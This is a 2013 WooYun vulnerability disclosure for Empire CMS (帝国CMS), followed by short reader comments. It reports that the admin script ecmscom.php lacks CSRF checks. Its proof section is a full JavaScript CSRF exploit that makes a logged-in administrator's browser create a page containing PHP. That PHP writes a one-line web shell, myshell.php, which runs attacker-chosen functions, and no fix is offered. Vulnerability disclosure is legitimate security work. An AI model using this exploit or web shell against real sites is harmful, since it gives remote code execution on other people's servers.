当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(55) 关注此漏洞

缺陷编号: WooYun-2013-32472

漏洞标题: 帝国CMS CSRF GetShell

相关厂商: phome.net

漏洞作者: ‫‌

提交时间: 2013-07-28 11:04

公开时间: 2013-10-26 11:05

漏洞类型: CSRF

危害等级: 中

自评Rank: 7

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: csrf Getshell

5人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

问题位置比较多,暂时举此一例。
对请求提交没有任何判断。竟然说是最安全的CMS,把DZ森马的完全不放在眼里啊。

详细说明:

废话不多。方式、Code直接放。

ecmscom.php

提交请求进行自定义页面添加,内容直接写后门。

截图



保存后直接在/e/admin/目录生成myshell.php。

检查发现没有判断请求来路。于是继续构造CSRF。

漏洞证明:

code 区域
<Script>
//type of form: multipart/form-data

function ajax(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}

var _x = ajax();

post();
function post() {
src="**.**.**.**/e/admin/ecmscom.php";
argv_0="enews=AddUserpage&id=&oldpath=page.html&cid=&gid=1&pagemod=1&title=aaa&path=page.html&classid=0&pagetitle=&pagekeywords=&pagedescription=&pagetext=%3C%3Fphp+file_put_contents%28%27myshell.php%27%2C%27%3C%3Fphp+%24_GET%5Bc%5D%28%24_POST%5Bx%5D%29%3B%3F%3E%27%29%3B%3F%3E&Submit=%E6%8F%90%E4%BA%A4";
xhr_act("POST",src,argv_0);
}
function xhr_act(_m,_s,_a){
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
_x.send(_a);
return _x.responseText;
}
</script>
Test!



保存页面,访问,生成。

修复方案:

你们看着办啊。。

版权声明:转载请注明来源 ‫‌@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-07-28 13:11 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸,懂的人会觉得很...)
    4

    说实话帝国cms真的算很安全的。除非getshell。几本没地方可以够了

  2. 2013-07-28 13:44 | ITLynn ( 路人 | Rank:13 漏洞数:5 | :-)三年了,我出来了)
    0

    洞主ID有个性!

  3. 2013-07-28 17:15 | 有妹子送上 ( 实习白帽子 | Rank:89 漏洞数:28 | 一只脚踩扁了紫罗兰,紫罗兰却把香味留在了...)
    0

    mark

  4. 2013-07-30 09:46 | Panni_007 ( 路人 | Rank:17 漏洞数:10 )
    0

    @ITLynn 洞主是个厂商!!!!!!!!!!!!!

  5. 2013-07-30 10:01 | SGKer ( 路人 | Rank:4 漏洞数:1 | 乌拉轼)
    0

    = = 洞主ID。。。好灰主流啊

  6. 2013-07-30 14:08 | Croxy ( 普通白帽子 | Rank:513 漏洞数:54 | 只会送人头)
    0

    @Panni_007 怎么看是厂商。。

  7. 2013-07-30 16:25 | Panni_007 ( 路人 | Rank:17 漏洞数:10 )
    0

    @Croxy 你点他名字看看……

  8. 2013-07-30 16:48 | Croxy ( 普通白帽子 | Rank:513 漏洞数:54 | 只会送人头)
    0

    @Panni_007 那些点不了的就是了? 那么以前也看过几个。。

  9. 2013-07-30 16:59 | juuxdd ( 路人 | Rank:4 漏洞数:1 | ส)
    0

    & #8235 ;& zwnj ; --------------- & #8235; &zwn j; 洞主的名字!~~~去掉空格

  10. 2013-08-01 15:51 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)
    0

    &#8235;&zwnj;

  11. 2013-08-12 22:19 | 萧然 ( 路人 | Rank:0 漏洞数:2 | 喜欢一切美丽的东西!)
    0

    &#8235;&zwnj; --------------- &#8235;&zwnj;什么用?

  12. 2013-11-22 13:08 | 月清晖 ( 路人 | Rank:9 漏洞数:1 | some of what?)
    0

    正在关注这个洞。

  13. 2014-09-20 15:23 | doubi ( 路人 | Rank:2 漏洞数:3 | 台上的24位女嘉宾好,我叫doubi来自欧洲,...)
    0

    找不到这个文件啊ecmscom.php 是在网站后加这个文件么

登录后才能发表评论,请先 登录